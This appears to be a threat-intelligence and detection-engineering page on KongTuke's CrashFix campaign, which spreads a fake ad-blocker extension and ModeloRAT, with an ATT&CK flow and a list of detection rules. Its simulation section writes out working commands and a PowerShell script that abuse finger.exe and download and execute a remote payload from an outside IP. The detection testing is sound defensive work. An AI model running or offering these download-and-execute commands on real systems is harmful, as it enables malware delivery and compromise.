Follow
Summary
KongTuke distributed a malicious Chrome extension, NexShield, mimicking uBlock Origin Lite. Once installed, it displays a “CrashFix” security warning to simulate a legitimate browser security incident, crashes the browser, and coerces the user into executing a malicious PowerShell command copied to the clipboard. The campaign deploys a Python RAT, ModeloRAT, on domain-joined systems and a multi-stage PowerShell chain on standalone hosts.
Investigation
Huntress analysts reviewed the extension’s code, linked command-and-control to nexsnield.com, and reverse engineered the payloads. They observed abuse of finger.exe as a LOLBin to retrieve attacker instructions, plus a DGA that generates .top domains. For environments on a domain, the researchers identified an RC4-encrypted Python implant that persists via the HKCU Run key. Additional tradecraft included anti-analysis checks, AMSI bypasses, and resource-exhaustion tactics intended to pressure users into rapid full compliance.
Mitigation
Block the Chrome extension ID and monitor for unknown extensions that impersonate popular ad blockers. Detect beaconing to nexsnield.com, the C2 IPs, and DGA-produced domains. Apply execution control to limit LOLBin usage (including finger.exe) and alert on suspicious Run-key values, particularly names crafted to resemble widely used software.
Response
Alert on NexShield-related extension installations and correlate with outbound connections to the identified C2 and DGA infrastructure. Isolate affected hosts and collect extension artifacts, registry Run keys, scheduled tasks, and dropped files. Remove ModeloRAT persistence, eradicate PowerShell-stage components, and remediate and validate the endpoint.
"graph TB %% Class definitions classDef action fill:#FFEEAA classDef tool fill:#99CCFF classDef malware fill:#FF9999 classDef process fill:#CCFFCC classDef persistence fill:#D9D9D9 classDef operator fill:#FFCC66 %% Nodes content_injection["<b>Action</b> – <b>T1659 Content Injection</b><br/>Malicious advertisement redirects victim to a fake Chrome Web Store page offering a malicious extension"] class content_injection action software_extension["<b>Action</b> – <b>T1176 Software Extensions</b><br/>Malicious extension masquerading as uBlock Origin Lite is installed in the browser"] class software_extension action extension_nexshield["<b>Tool</b> – <b>Name</b>: NexShield (malicious Chrome extension)<br/><b>Description</b>: Provides persistence and executes further malicious logic"] class extension_nexshield tool user_execution["<b>Action</b> – <b>T1204.004 User Execution</b><br/>Extension copies a PowerShell command to the clipboard and victim runs it via Win+R"] class user_execution action powershell_process["<b>Process</b> – <b>T1059.001 PowerShell</b><br/>Executes PowerShell command that downloads additional payloads"] class powershell_process process cmd_process["<b>Process</b> – <b>T1059.003 Windows Command Shell</b><br/>PowerShell invokes cmd.exe to run further stages"] class cmd_process process sandbox_evasion["<b>Action</b> – <b>T1497.002 Virtualization/Sandbox Evasion</b><br/>Payload performs extensive VM, sandbox and analysisu2011tool checks"] class sandbox_evasion action dos_exhaustion["<b>Action</b> – <b>T1499.003 Endpoint Denial of Service</b><br/>Creates billions of Chrome runtime ports to exhaust CPU and memory, causing browser crash"] class dos_exhaustion action event_trigger["<b>Action</b> – <b>T1546 Event Triggered Execution</b><br/>Uses Chrome Alarms API to delay malicious actions by 60u202fminutes and repeat every 10u202fminutes"] class event_trigger action dead_drop["<b>Action</b> – <b>T1102.001 Web Service Dead Drop Resolver</b><br/>Contacts dynamically generated DGA domains to retrieve further stages"] class dead_drop action dga_resolution["<b>Action</b> – <b>T1568 Dynamic Resolution</b><br/>Domain generation algorithm produces weekly rotating domains for C2"] class dga_resolution action bidirectional_comm["<b>Action</b> – <b>T1102.002 Web Service Bidirectional Communication</b><br/>ModeloRAT exchanges encrypted commands and responses over HTTP"] class bidirectional_comm action oneway_comm["<b>Action</b> – <b>T1102.003 Web Service Oneu2011Way Communication</b><br/>Sends telemetry and install/update data to attackeru2011controlled server"] class oneway_comm action encrypted_rc4["<b>Action</b> – <b>T1573.001 Encrypted Channel</b><br/>C2 traffic is encrypted with RC4 symmetric cryptography"] class encrypted_rc4 action obfuscation["<b>Action</b> – <b>T1027 Obfuscated Files or Information</b><br/>Payloads are layered with Base64, XOR and AES encryption"] class obfuscation action stripped_payload["<b>Action</b> – <b>T1027.008 Stripped Payloads</b><br/>Payloads are stripped and encoded to evade analysis"] class stripped_payload action embedded_payload["<b>Action</b> – <b>T1027.009 Embedded Payloads</b><br/>Encrypted payloads are loaded directly in memory"] class embedded_payload action appcert_dll["<b>Action</b> – <b>T1546.009 Event Triggered Execution: AppCert DLLs</b><br/>DoS loop leverages Chrome runtime ports analogous to AppCert DLL technique"] class appcert_dll action remote_access_tool["<b>Malware</b> – <b>T1219 Remote Access Tools</b><br/>ModeloRAT provides full remoteu2011access capabilities"] class remote_access_tool malware persistence_run["<b>Action</b> – <b>T1554 Compromise Host Software Binary</b><br/>HKCU\Software\Microsoft\Windows\CurrentVersion\Run entry launches pythonw.exe for persistence"] class persistence_run persistence exec_guardrail["<b>Action</b> – <b>T1480.002 Execution Guardrails</b><br/>Checks for prior execution via UUID beacons to avoid duplicate infections"] class exec_guardrail action %% Edges content_injection –>|leads_to| software_extension software_extension –>|installs| extension_nexshield extension_nexshield –>|provides_persistence| persistence_run extension_nexshield –>|copies_command| user_execution user_execution –>|triggers| powershell_process powershell_process –>|launches| cmd_process powershell_process –>|performs| sandbox_evasion sandbox_evasion –>|allows| powershell_process powershell_process –>|creates| dos_exhaustion dos_exhaustion –>|uses| appcert_dll extension_nexshield –>|sets| event_trigger event_trigger –>|delays| powershell_process powershell_process –>|contacts| dead_drop dead_drop –>|uses| dga_resolution dga_resolution –>|provides| bidirectional_comm bidirectional_comm –>|encrypts_with| encrypted_rc4 bidirectional_comm –>|exchanges_with| remote_access_tool oneway_comm –>|sends_to| encrypted_rc4 powershell_process –>|obfuscates_using| obfuscation obfuscation –>|includes| stripped_payload obfuscation –>|includes| embedded_payload remote_access_tool –>|communicates_via| bidirectional_comm remote_access_tool –>|sends_telemetry| oneway_comm persistence_run –>|creates| exec_guardrail exec_guardrail –>|prevents| persistence_run "
Attack Flow
Detections
Call Suspicious .NET Methods from Powershell (via powershell)
View
Suspicious CURL Usage (via cmdline)
View
Short File Name (via cmdline)
View
Possible Hands-on or Scripting Operation was Performed in Unusual Folders (via cmdline)
View
Suspicious Powershell Strings (via powershell)
View
Call Suspicious Windows API Functions from Powershell (via powershell)
View
Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
View
An Archive Was Extracted To Suspicious Directory Using Powershell (via powershell)
View
Python Execution from Suspicious Folders (via cmdline)
View
Possible Powershell Obfuscation Indicators (via powershell)
View
Possible System Enumeration (via cmdline)
View
Download or Upload via Powershell (via cmdline)
View
IOCs (SourceIP) to detect: Dissecting CrashFix: KongTuke’s New Toy
View
IOCs (HashSha256) to detect: Dissecting CrashFix: KongTuke’s New Toy
View
IOCs (DestinationIP) to detect: Dissecting CrashFix: KongTuke’s New Toy
View
IOCs (Emails) to detect: Dissecting CrashFix: KongTuke’s New Toy
View
Detect KongTuke CrashFix Malicious Command Execution [Windows Process Creation]
View
Detection of AMSI Bypass and Evidence Removal via PowerShell [Windows Powershell]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
The adversary first copies the legitimatefinger.exebinary to the temporary directory, renames it toct.exe, and then uses a nestedcmd /cchain to invoke the copied binary with a crafted argument that contacts a remote C2 server (199.217.98.108). The binary streams the payload back to the command line, which is then piped into a second hiddencmdthat executes the received code. Afterwards, the attacker leverages PowerShell to download a secondary payload viaInvoke‑WebRequestand immediately executes it withiex. All steps are performed with minimal UI (/min) to avoid user detection.1. Copy finger.exe → %TEMP%ct.exe 2. Run: cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd" 3. PowerShell download & execute secondary payload: powershell -NoProfile -WindowStyle Hidden -Command "iex (Invoke-WebRequest -Uri 'http://199.217.98.108/payload.ps1' -UseBasicParsing).Content" -
Regression Test Script: The script below reproduces the full attack chain on a Windows test machine. Run it in an elevated PowerShell session.
#------------------------------------------------- # KongTuke CrashFix Malicious Command Execution #------------------------------------------------- # 1. Deploy the LOLBin (finger.exe) to %TEMP% as ct.exe $fingerPath = "$env:windirsystem32finger.exe" $tempExe = "$env:TEMPct.exe" Copy-Item -Path $fingerPath -Destination $tempExe -Force # 2. Execute the malicious cmd chain (matches Sigma rule) $maliciousCmd = 'cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd"' Start-Process -FilePath "cmd.exe" -ArgumentList "/c $maliciousCmd" -WindowStyle Hidden # 3. PowerShell web‑download‑execute secondary payload $payloadUrl = 'http://199.217.98.108/payload.ps1' $psCommand = "iex (Invoke-WebRequest -Uri `'$payloadUrl`' -UseBasicParsing).Content" Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `$psCommand`" -WindowStyle Hidden #------------------------------------------------- -
Cleanup Commands: Remove artifacts and terminate any lingering processes created by the test.
# Delete the copied ct.exe Remove-Item -Path "$env:TEMPct.exe" -ErrorAction SilentlyContinue # Kill any stray cmd.exe or powershell.exe processes started by the test (filter by specific command line) Get-WmiObject Win32_Process | Where-Object { $_.CommandLine -match 'finger.exe|199.217.98.108' } | ForEach-Object { $_.Terminate() } # Optional: clear Event Log if needed for repeatability # wevlutil cl Security